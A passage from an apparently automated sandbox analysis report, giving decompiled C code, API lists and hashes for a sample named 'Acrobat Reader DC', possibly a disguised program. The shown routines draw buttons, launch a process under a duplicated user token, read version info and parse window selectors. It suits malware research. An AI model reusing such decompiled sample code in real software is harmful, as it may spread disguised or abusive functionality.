                                  • LoadCursorW.USER32(00000000,00007F00), ref: 00430898
                                  • SetCursor.USER32(00000000), ref: 0043089F
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Cursor$Load
                                  • String ID:
                                  • API String ID: 1675784387-0
                                  • Opcode ID: c7473186da6a924b3206e1e01d9541ab2871430d40d1833d6e341d2f3415b8bd
                                  • Instruction ID: ada3a8d1d263842f4cf6b5ed80e179871947c4c62c163598e9ab22da256eac1d
                                  • Opcode Fuzzy Hash: c7473186da6a924b3206e1e01d9541ab2871430d40d1833d6e341d2f3415b8bd
                                  • Instruction Fuzzy Hash: AF3101729C8205B7EA546BE0BE1DF5D3618AB28727F004836F309B54D09AF551509B6D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 92%
                                  			E004308EF(struct HBRUSH__* _a4, struct HWND__** _a8) {
                                  				long _v8;
                                  				long _v12;
                                  				signed int _v16;
                                  				int _v20;
                                  				signed int _v24;
                                  				WCHAR* _v28;
                                  				void* _v32;
                                  				void* _v36;
                                  				void* _v40;
                                  				long _v44;
                                  				struct tagRECT _v60;
                                  				void* __edi;
                                  				void* __esi;
                                  				signed int _t72;
                                  				signed int _t73;
                                  				long _t74;
                                  				long _t75;
                                  				long _t76;
                                  				long _t78;
                                  				long _t79;
                                  				void* _t80;
                                  				signed int _t93;
                                  				WCHAR* _t95;
                                  				struct HWND__** _t117;
                                  				struct HBRUSH__* _t149;
                                  				WCHAR* _t150;
                                  				struct HDC__* _t152;
                                  				signed int _t159;
                                  
                                  				_t149 = _a4;
                                  				_t72 =  *(_t149 + 0x10);
                                  				_t152 =  *(_t149 + 0x18);
                                  				_t73 = _t72 & 0x00000006;
                                  				_v24 = _t72 & 0x00000010;
                                  				_v16 = _t73;
                                  				if(_t73 == 0) {
                                  					_t117 = _a8;
                                  					_t74 =  *(_t117 + 0x48);
                                  					__eflags = _t74 - 0xffffffff;
                                  					if(__eflags == 0) {
                                  						_t74 = GetSysColor(0x12);
                                  					}
                                  					_t75 = SetTextColor(_t152, _t74);
                                  				} else {
                                  					_t75 = SetTextColor(_t152, GetSysColor(0xe));
                                  					_t117 = _a8;
                                  				}
                                  				_v8 = _t75;
                                  				_t76 =  *(_t117 + 0x44);
                                  				if(_t76 != 0xffffffff) {
                                  					_a4 = CreateSolidBrush(_t76);
                                  					_t78 =  *(_t117 + 0x44);
                                  				} else {
                                  					_a4 = GetSysColorBrush(0xf);
                                  					_t78 = GetSysColor(0xf);
                                  				}
                                  				_v12 = _t78;
                                  				if(_v16 == 0) {
                                  					_t79 = 0x743c00;
                                  				} else {
                                  					_t79 = GetSysColor(0x11);
                                  				}
                                  				_t80 = CreatePen(0, 1, _t79);
                                  				_v40 = _t80;
                                  				_v36 = SelectObject(_t152, _t80);
                                  				_v44 = SetBkColor(_t152, _v12);
                                  				_v32 = SelectObject(_t152, _a4);
                                  				_v60.top =  *(_t149 + 0x20);
                                  				_v60.left =  *(_t149 + 0x1c);
                                  				_v60.right =  *(_t149 + 0x24);
                                  				_v60.bottom =  *(_t149 + 0x28);
                                  				InflateRect( &_v60, 0xffffffff, 0xffffffff);
                                  				RoundRect(_t152, _v60.left, _v60.top, _v60.right, _v60.bottom, 5, 5);
                                  				_v12 = 0x105;
                                  				_t159 = GetWindowLongW( *_a8, 0xfffffff0) & 0x00002000;
                                  				if(_t159 == 0) {
                                  					_v12 = 0x125;
                                  				}
                                  				_t93 = SendMessageW( *_a8, 0xe, 0, 0) + 1;
                                  				_v20 = _t93;
                                  				_push( ~(0 | _t159 > 0x00000000) | _t93 * 0x00000002);
                                  				_t95 = E004115D7(_t149, _t152, _t159);
                                  				_v28 = _t95;
                                  				GetWindowTextW( *_a8, _t95, _v20);
                                  				if(_v24 != 0) {
                                  					_v60.top =  *(_t149 + 0x20);
                                  					_v60 =  *(_t149 + 0x1c);
                                  					_v60.right =  *(_t149 + 0x24);
                                  					_v60.bottom =  *(_t149 + 0x28);
                                  					InflateRect( &_v60, 0xfffffffd, 0xfffffffd);
                                  					DrawFocusRect(_t152,  &_v60);
                                  				}
                                  				if(_v16 != 0) {
                                  					SetTextColor(_t152, GetSysColor(0x11));
                                  				}
                                  				_t150 = _v28;
                                  				DrawTextW(_t152, _t150, 0xffffffff,  &_v60, _v12);
                                  				_push(_t150);
                                  				E004111DC();
                                  				SelectObject(_t152, _v32);
                                  				DeleteObject(_a4);
                                  				SelectObject(_t152, _v36);
                                  				DeleteObject(_v40);
                                  				SetTextColor(_t152, _v8);
                                  				SetBkColor(_t152, _v44);
                                  				return 1;
                                  			}

                                  APIs
                                  • GetSysColor.USER32(0000000E), ref: 00430913
                                  • SetTextColor.GDI32(?,00000000), ref: 0043091B
                                  • GetSysColor.USER32(00000012), ref: 00430933
                                  • SetTextColor.GDI32(?,?), ref: 0043093B
                                  • GetSysColorBrush.USER32(0000000F), ref: 0043094E
                                  • GetSysColor.USER32(0000000F), ref: 00430959
                                  • CreateSolidBrush.GDI32(?), ref: 00430962
                                  • GetSysColor.USER32(00000011), ref: 00430979
                                  • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0043098B
                                  • SelectObject.GDI32(?,00000000), ref: 0043099C
                                  • SetBkColor.GDI32(?,?), ref: 004309A6
                                  • SelectObject.GDI32(?,?), ref: 004309B4
                                  • InflateRect.USER32(?,000000FF,000000FF), ref: 004309D9
                                  • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004309F4
                                  • GetWindowLongW.USER32(?,000000F0), ref: 00430A09
                                  • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00430A29
                                  • GetWindowTextW.USER32 ref: 00430A5A
                                  • InflateRect.USER32(?,000000FD,000000FD), ref: 00430A86
                                  • DrawFocusRect.USER32 ref: 00430A91
                                  • GetSysColor.USER32(00000011), ref: 00430A9F
                                  • SetTextColor.GDI32(?,00000000), ref: 00430AA7
                                  • DrawTextW.USER32(?,?,000000FF,?,00000105), ref: 00430ABC
                                  • SelectObject.GDI32(?,?), ref: 00430AD0
                                  • DeleteObject.GDI32(00000105), ref: 00430ADC
                                  • SelectObject.GDI32(?,?), ref: 00430AE3
                                  • DeleteObject.GDI32(?), ref: 00430AE9
                                  • SetTextColor.GDI32(?,?), ref: 00430AF0
                                  • SetBkColor.GDI32(?,?), ref: 00430AFB
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Color$ObjectText$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                  • String ID:
                                  • API String ID: 1582027408-0
                                  • Opcode ID: 1c1fb4ccc90ca3c01eeee5a68a8ff6c4e85f7d1c42b7366d75b3c8e5274adb0a
                                  • Instruction ID: b12033eb3fa9204049de4d7caedd8dcf025edfa44633034d6aae7949f8ecba99
                                  • Opcode Fuzzy Hash: 1c1fb4ccc90ca3c01eeee5a68a8ff6c4e85f7d1c42b7366d75b3c8e5274adb0a
                                  • Instruction Fuzzy Hash: 6F713071900209BFDB04DFA8DD88EAEBBB9FF48710F104619F915A7290D774A941CFA8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 74%
                                  			E00446313(intOrPtr _a4, char _a7, intOrPtr _a8, void* _a12, signed int _a16, intOrPtr _a20, signed int _a24, WCHAR* _a28, struct _STARTUPINFOW* _a32, struct _PROCESS_INFORMATION* _a36) {
                                  				char _v9;
                                  				void* _v16;
                                  				char _v20;
                                  				void* _v24;
                                  				void* _v28;
                                  				struct HWINSTA__* _v32;
                                  				intOrPtr _v40;
                                  				WCHAR* _v44;
                                  				intOrPtr _v52;
                                  				char _v56;
                                  				char _v60;
                                  				intOrPtr _v80;
                                  				char _v88;
                                  				void* __edi;
                                  				void* __esi;
                                  				char _t88;
                                  				struct HDESK__* _t90;
                                  				struct HWINSTA__* _t91;
                                  				void* _t95;
                                  				struct HDESK__* _t103;
                                  				void* _t105;
                                  				void* _t106;
                                  				struct _STARTUPINFOW* _t109;
                                  				intOrPtr _t110;
                                  				void* _t118;
                                  				WCHAR* _t127;
                                  				int _t156;
                                  				struct HWINSTA__* _t158;
                                  				void* _t159;
                                  				void* _t160;
                                  				intOrPtr _t175;
                                  
                                  				_t154 = _a4;
                                  				_t158 = 0;
                                  				_v9 = 0;
                                  				_v16 = 0;
                                  				_v24 = 0;
                                  				_v20 = 0;
                                  				_v32 = 0;
                                  				_t127 = 0;
                                  				_v28 = 0;
                                  				E00412F40( &_v88, 0, 0x20);
                                  				_t85 = _a16;
                                  				_t160 = _t159 + 0xc;
                                  				_v88 = 0x20;
                                  				_v80 = _a4;
                                  				_a7 = 0;
                                  				if((_a16 & 0x00000001) != 0) {
                                  					_a7 = 1;
                                  				}
                                  				if(E00436CD7(_t154, _a8, _a12, _t85,  &_v16) == 0) {
                                  					L24:
                                  					_t88 = _v60;
                                  					__eflags = _t88;
                                  					if(_t88 != 0) {
                                  						__imp__UnloadUserProfile(_v16, _t88);
                                  					}
                                  					goto L26;
                                  				} else {
                                  					if((_a16 & 0x00000002) == 0) {
                                  						L6:
                                  						_t158 = OpenWindowStationW(L"winsta0", 0, 0x60000);
                                  						if(_t158 == 0 || _t158 == 0xffffffff) {
                                  							goto L24;
                                  						} else {
                                  							_v32 = GetProcessWindowStation();
                                  							if(SetProcessWindowStation(_t158) == 0) {
                                  								goto L24;
                                  							}
                                  							_t103 = OpenDesktopW(L"default", 0, 0, 0x60081);
                                  							_v24 = _t103;
                                  							if(_t103 == 0) {
                                  								goto L24;
                                  							}
                                  							_t171 = _t103 - 0xffffffff;
                                  							if(_t103 == 0xffffffff) {
                                  								goto L24;
                                  							}
                                  							_t105 = E00436D09(_t158, _t171, _v16,  &_v20);
                                  							_t172 = _t105;
                                  							if(_t105 == 0) {
                                  								goto L24;
                                  							}
                                  							_v56 = 0xb00;
                                  							_v52 = 0xf0000000;
                                  							_v44 = 0x400;
                                  							_v40 = 0xf037f;
                                  							_t106 = E00446124(_t172, _t158, _v20,  &_v56);
                                  							_t173 = _t106;
                                  							if(_t106 == 0) {
                                  								goto L24;
                                  							}
                                  							_v44 = _t127;
                                  							_v40 = 0xf01ff;
                                  							if(E00445F35(_t173, _v24, _v20,  &_v44) == 0) {
                                  								goto L24;
                                  							}
                                  							_t109 = _a32;
                                  							_t109->lpDesktop = L"winsta0\\default";
                                  							_t110 = _a20;
                                  							_t156 =  *(_t109 + 0x2c) & 0x00000100;
                                  							_a12 = _t156;
                                  							_t175 = _t110;
                                  							if(_t175 != 0) {
                                  								_t47 = E004111C1(_t110) + 1; // 0x1
                                  								_push( ~(_t175 > 0) | _t47 * 0x00000002);
                                  								_t127 = E004115D7(_t47, _t158,  ~(_t175 > 0) | _t47 * 0x00000002);
                                  								_t110 = E00412FBA(_t127, _a20, _t47);
                                  								_t156 = _a12;
                                  								_t160 = _t160 + 0x14;
                                  							}
                                  							if(_a7 == 0) {
                                  								L18:
                                  								if((_a16 & 0x00000004) != 0) {
                                  									L20:
                                  									if(CreateProcessAsUserW(_v16, 0, _t127, 0, 0, _t156, _a24 | 0x00000400, _v28, _a28, _a32, _a36) == 0) {
                                  										goto L24;
                                  									}
                                  									if(_a7 != 0) {
                                  										E00436C6E(_a36,  &_v60,  &_v16);
                                  									}
                                  									_v9 = 1;
                                  									L26:
                                  									E00436BA9(_v20);
                                  									if(_t158 != 0) {
                                  										CloseWindowStation(_t158);
                                  									}
                                  									_t90 = _v24;
                                  									if(_t90 != 0) {
                                  										CloseDesktop(_t90);
                                  									}
                                  									_t91 = _v32;
                                  									if(_t91 != 0) {
                                  										SetProcessWindowStation(_t91);
                                  									}
                                  									CloseHandle(_v16);
                                  									_push(_t127);
                                  									E004111DC();
                                  									_t95 = _v28;
                                  									if(_t95 != 0) {
                                  										__imp__DestroyEnvironmentBlock(_t95);
                                  									}
                                  									return _v9;
                                  								}
                                  								_t118 = _v16;
                                  								__imp__CreateEnvironmentBlock( &_v28, _t118, 0);
                                  								if(_t118 == 0) {
                                  									goto L24;
                                  								}
                                  								goto L20;
                                  							} else {
                                  								__imp__LoadUserProfileW(_v16,  &_v88);
                                  								if(_t110 == 0) {
                                  									goto L24;
                                  								}
                                  								goto L18;
                                  							}
                                  						}
                                  					}
                                  					if(DuplicateTokenEx(_v16, 0, 0, 2, 1,  &_a12) == 0) {
                                  						goto L24;
                                  					}
                                  					CloseHandle(_v16);
                                  					_v16 = _a12;
                                  					goto L6;
                                  				}
                                  			}


                                  APIs
                                  • _memset.LIBCMT ref: 0044633D
                                  • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 0044638E
                                  • CloseHandle.KERNEL32(?), ref: 004463A0
                                  • OpenWindowStationW.USER32 ref: 004463B8
                                  • GetProcessWindowStation.USER32 ref: 004463D1
                                  • SetProcessWindowStation.USER32(00000000), ref: 004463DB
                                  • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 004463F7
                                  • _wcslen.LIBCMT ref: 00446498
                                    • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                  • _wcsncpy.LIBCMT ref: 004464C0
                                  • LoadUserProfileW.USERENV(?,00000020), ref: 004464D9
                                  • CreateEnvironmentBlock.USERENV(?,?,00000000), ref: 004464F3
                                  • CreateProcessAsUserW.ADVAPI32(?,00000000,00000000,00000000,00000000,?,?,?,?,000F01FF,00000400), ref: 00446522
                                  • UnloadUserProfile.USERENV(?,?), ref: 00446555
                                  • CloseWindowStation.USER32(00000000), ref: 0044656C
                                  • CloseDesktop.USER32(?), ref: 0044657A
                                  • SetProcessWindowStation.USER32(?), ref: 00446588
                                  • CloseHandle.KERNEL32(?), ref: 00446592
                                  • DestroyEnvironmentBlock.USERENV(?), ref: 004465A9
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: StationWindow$CloseProcess$User$BlockCreateDesktopEnvironmentHandleOpenProfile$DestroyDuplicateLoadTokenUnload_malloc_memset_wcslen_wcsncpy
                                  • String ID: $@OH$default$winsta0
                                  • API String ID: 2173856841-3791954436
                                  • Opcode ID: 5824ace93f6d80d94595fe83079761c9375f447ecbc8cf85fbb585e8fea6ba76
                                  • Instruction ID: a255b9755a473e3b45922b0ee48cea4cb67e1360e8ecd59b8ab49ad27cdc7b44
                                  • Opcode Fuzzy Hash: 5824ace93f6d80d94595fe83079761c9375f447ecbc8cf85fbb585e8fea6ba76
                                  • Instruction Fuzzy Hash: A28180B0A00209ABEF10CFA5DD4AFAF77B8AF49704F05455EF914A7284D778D901CB69
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 67%
                                  			E00433A13(short* _a4, intOrPtr _a8, intOrPtr _a12) {
                                  				void* _v8;
                                  				void* _v12;
                                  				unsigned int _v16;
                                  				int _v20;
                                  				int _v24;
                                  				void* __edi;
                                  				void* __esi;
                                  				int _t39;
                                  				int _t40;
                                  				int _t42;
                                  				int _t46;
                                  				int _t61;
                                  				int _t64;
                                  				void* _t75;
                                  				void* _t85;
                                  				unsigned int _t86;
                                  				intOrPtr _t101;
                                  				intOrPtr _t103;
                                  				intOrPtr _t105;
                                  				int _t109;
                                  				short* _t110;
                                  				void* _t115;
                                  				void* _t116;
                                  				void* _t118;
                                  				void* _t125;
                                  				void* _t126;
                                  
                                  				_t116 = _t115 - 0x14;
                                  				_t101 = _a12;
                                  				_t109 = GetFileVersionInfoSizeW(_a4,  &_v24);
                                  				if(_t109 != 0) {
                                  					_push(_t109);
                                  					_t75 = E004115D7(_t101, _t109, __eflags);
                                  					GetFileVersionInfoW(_a4, 0, _t109, _t75);
                                  					_push( ~(0 | __eflags > 0x00000000) | (E004111C1(_t101) + 0x0000001a) * 0x00000002);
                                  					_t110 = E004115D7(_t101, _t109, __eflags);
                                  					E00411567(_t110, "\\");
                                  					_t39 = E0041313C(_t101, "\\");
                                  					_t118 = _t116 + 0x1c;
                                  					__eflags = _t39;
                                  					if(_t39 != 0) {
                                  						E00411536(_t110, L"StringFileInfo\\");
                                  						_t61 = E004134BD(_t101, "\\");
                                  						_t125 = _t118 + 0x10;
                                  						__eflags = _t61;
                                  						if(_t61 != 0) {
                                  							E00411536(_t110, _t101);
                                  							_t118 = _t125 + 8;
                                  						} else {
                                  							_t64 = VerQueryValueW(_t75, L"\\VarFileInfo\\Translation",  &_v12,  &_v20);
                                  							__eflags = _t64;
                                  							if(_t64 == 0) {
                                  								E00411536(_t110, L"04090000");
                                  								_t126 = _t125 + 8;
                                  							} else {
                                  								_t14 =  &(_t110[0x10]); // 0x20
                                  								_v16 =  *_v12;
                                  								E00432E88( *_v12, 0, _t14, 4);
                                  								_t17 =  &(_t110[0x14]); // 0x28
                                  								E00432E88(_v16 >> 0x10, 0, _t17, 4);
                                  								_t126 = _t125 + 0x20;
                                  							}
                                  							E00411536(_t110, "\\");
                                  							E00411536(_t110, _t101);
                                  							_t118 = _t126 + 0x10;
                                  						}
                                  					}
                                  					_t40 = E004114AB(_t101, _t101, L"DefaultLangCodepage");
                                  					__eflags = _t40;
                                  					if(_t40 != 0) {
                                  						_t42 = VerQueryValueW(_t75, _t110,  &_v8,  &_v20);
                                  						__eflags = _t42;
                                  						if(_t42 == 0) {
                                  							_push(_t75);
                                  							E004111DC();
                                  							_push(_t110);
                                  							E004111DC();
                                  							__eflags = 0;
                                  							return 0;
                                  						} else {
                                  							_t46 = E0041313C(_t101, "\\");
                                  							__eflags = _t46;
                                  							if(_t46 != 0) {
                                  								_t103 = _a8;
                                  								E00412FBA(_t103, _v8, 0x200);
                                  								__eflags = 0;
                                  								 *((short*)(_t103 + 0x400)) = 0;
                                  							} else {
                                  								_t85 = _v8;
                                  								_t86 =  *(_t85 + 0xc);
                                  								_push(_t86 & 0x0000ffff);
                                  								_push(_t86 >> 0x10);
                                  								_push( *(_t85 + 8) & 0x0000ffff);
                                  								E0041329B(_a8, _a8, L"%u.%u.%u.%u",  *(_t85 + 8) >> 0x10);
                                  							}
                                  							_push(_t75);
                                  							E004111DC();
                                  							_push(_t110);
                                  							E004111DC();
                                  							return 1;
                                  						}
                                  					} else {
                                  						_t105 = _a8;
                                  						_t19 =  &(_t110[0x10]); // 0x20
                                  						E00412FBA(_t105, _t19, 8);
                                  						__eflags = 0;
                                  						_push(_t75);
                                  						 *((short*)(_t105 + 0x10)) = 0;
                                  						E004111DC();
                                  						_push(_t110);
                                  						E004111DC();
                                  						return 1;
                                  					}
                                  				} else {
                                  					return 0;
                                  				}
                                  			}


                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: _wcscat$FileInfoVersion$QuerySizeValue__wcsicoll_wcscpy_wcslen_wcsncpy
                                  • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                  • API String ID: 1503153545-1459072770
                                  • Opcode ID: efc6e4e5e9717c78149bced3479276292890345fc235e4a69a67d693c99869e0
                                  • Instruction ID: bf9a9138137c8e48d15734b0b0bf1383f69a7efb75f9ce998fc77f2ad016157b
                                  • Opcode Fuzzy Hash: efc6e4e5e9717c78149bced3479276292890345fc235e4a69a67d693c99869e0
                                  • Instruction Fuzzy Hash: D551F672A402043BD610BB269C43EFFB36C9F49715F10055FFE09A6242EA7DEA5183AD
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 72%
                                  			E00469296(void* __edx, void* __eflags, void* __fp0, intOrPtr* _a4) {
                                  				char _v24;
                                  				char _v40;
                                  				char _v56;
                                  				void* __ebx;
                                  				void* __edi;
                                  				void* __esi;
                                  				void* _t33;
                                  				void* _t35;
                                  				void* _t37;
                                  				void* _t39;
                                  				char* _t53;
                                  				void* _t61;
                                  				void* _t62;
                                  				intOrPtr* _t64;
                                  				void* _t77;
                                  
                                  				_t77 = __fp0;
                                  				_t61 = __edx;
                                  				E0040BC70( &_v24, __eflags);
                                  				_t58 =  &_v40;
                                  				E0040BC70( &_v40, __eflags);
                                  				_t64 = _a4;
                                  				if(E00436565(_t64) != 0 || E004114AB(_t62,  *_t64, L"LAST") == 0) {
                                  					_t53 = L"[LAST";
                                  					goto L14;
                                  				} else {
                                  					if(E004114AB(_t62,  *_t64, L"ACTIVE") != 0) {
                                  						_t33 = E0041341F( *_t64, L"HANDLE=", 7);
                                  						__eflags = _t33;
                                  						if(_t33 != 0) {
                                  							_t35 = E0041341F( *_t64, L"REGEXP=", 7);
                                  							__eflags = _t35;
                                  							if(_t35 != 0) {
                                  								_t37 = E0041341F( *_t64, L"CLASSNAME=", 0xa);
                                  								__eflags = _t37;
                                  								if(_t37 != 0) {
                                  									_t39 = E004114AB(_t62,  *_t64, L"ALL");
                                  									__eflags = _t39;
                                  									if(_t39 == 0) {
                                  										_t53 = L"[ALL";
                                  										goto L14;
                                  									}
                                  								} else {
                                  									E00402160( &_v24, L"[CLASS:", _t61, _t62);
                                  									_push(0xffffffff);
                                  									_push(0xa);
                                  									goto L10;
                                  								}
                                  							} else {
                                  								E00402160( &_v24, L"[REGEXPTITLE:", _t61, _t62);
                                  								_push(0xffffffff);
                                  								_push(7);
                                  								goto L10;
                                  							}
                                  						} else {
                                  							E00402160( &_v24, L"[HANDLE:", _t61, _t62);
                                  							_push(0xffffffff);
                                  							_push(7);
                                  							L10:
                                  							_push( &_v56);
                                  							_push(_t64);
                                  							E0040E0A0( &_v40, E0046150F(__eflags));
                                  							_t58 =  &_v56;
                                  							E00402250( &_v56);
                                  							E00461321(__eflags, _t77,  &_v40);
                                  							E0040BD50( &_v24, _t77,  &_v40);
                                  							_t64 = _a4;
                                  							goto L15;
                                  						}
                                  					} else {
                                  						_t53 = L"[ACTIVE";
                                  						L14:
                                  						E00402160( &_v24, _t53, _t61, _t62);
                                  						L15:
                                  						E0040D200( &_v24, _t58, "]", _t77);
                                  						E0040E0A0(_t64,  &_v24);
                                  					}
                                  				}
                                  				E00402250( &_v40);
                                  				return E00402250( &_v24);
                                  			}


                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: __wcsicoll$__wcsnicmp
                                  • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:$pQH
                                  • API String ID: 790654849-32604322
                                  • Opcode ID: fda3356f9a514e75ac50708b2e0f549657cc7649cef593225b85309bc7d45243
                                  • Instruction ID: c91e69f26a1c2718e03151092e39642ccf44f92bf630fd0466772f198d10bc2a
                                  • Opcode Fuzzy Hash: fda3356f9a514e75ac50708b2e0f549657cc7649cef593225b85309bc7d45243
                                  • Instruction Fuzzy Hash: CA317731A0420966DB10FAA2DD46BAE736C9F15315F20053BBD00BB2D5E7BC6E4587AE
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 84%
                                  			E0044870C(void* __eflags, intOrPtr _a4, signed int _a8) {
                                  				int _v20;
                                  				void* _v28;
                                  				intOrPtr _v56;
                                  				int _v60;
                                  				long _v64;
                                  				void* _v68;
                                  				int _v100;
                                  				signed int _v104;
                                  				long _v108;
                                  				int _v112;
                                  				void* _v116;
                                  				signed int _v120;
                                  				struct HWND__** _v124;
                                  				struct HWND__* _v128;
                                  				signed char _v132;
                                  				signed int _v133;
                                  				signed int _v140;
                                  				int _v148;
                                  				intOrPtr _t172;
                                  				signed int _t176;
                                  				void* _t178;
                                  				signed char _t179;
                                  				signed char _t181;
                                  				signed int _t198;
                                  				signed char _t199;
                                  				signed char _t201;
                                  				int _t209;
                                  				signed int _t212;
                                  				struct HWND__* _t215;
                                  				signed int _t221;
                                  				struct HWND__* _t226;
                                  				intOrPtr* _t229;
                                  
                                  				_t198 = _a8;
                                  				if(E00441AF5(0x4a8630, _a4,  &_v120,  &_v132) != 0) {
                                  					_t172 =  *0x4a8690; // 0x0
                                  					_t209 =  *0x4a86a4; // 0xa71980
                                  					_t224 = _v132;
                                  					_t229 =  *((intOrPtr*)( *((intOrPtr*)(_t209 + _v132 * 4))));
                                  					_v124 =  *((intOrPtr*)( *((intOrPtr*)(_t172 + _v120 * 4))));
                                  					_v128 =  *_t229;
                                  					_v133 =  *((intOrPtr*)(_t229 + 0x88));
                                  					_v140 = 0;
                                  					if(_t198 < 0) {
                                  						_t198 = 0;
                                  					}
                                  					_t176 = _t198 & 0x00000100;
                                  					_v132 = _t176;
                                  					if(_t176 != 0) {
                                  						E004415D1(_v120, _t224);
                                  						_v148 = 1;
                                  					}
                                  					if((_t198 & 0x00000800) != 0) {
                                  						SetWindowPos(_v128, 0, 0, 0, 0, 0, 0x13);
                                  						_v140 = 1;
                                  					}
                                  					_t178 = (_v133 & 0x000000ff) + 0xfffffff7;
                                  					if(_t178 > 0x11) {
                                  						L62:
                                  						_t199 = _t198 & 0x000010f8;
                                  						_t179 = _t199;
                                  						_v132 = _t179;
                                  						if(_t199 > 0) {
                                  							_t226 = _v128;
                                  							_t201 = 0;
                                  							_v140 = 1;
                                  							if(_t179 < 0) {
                                  								_t201 = 0xc0;
                                  								EnableWindow(_t226, 0);
                                  								_t179 = _v132;
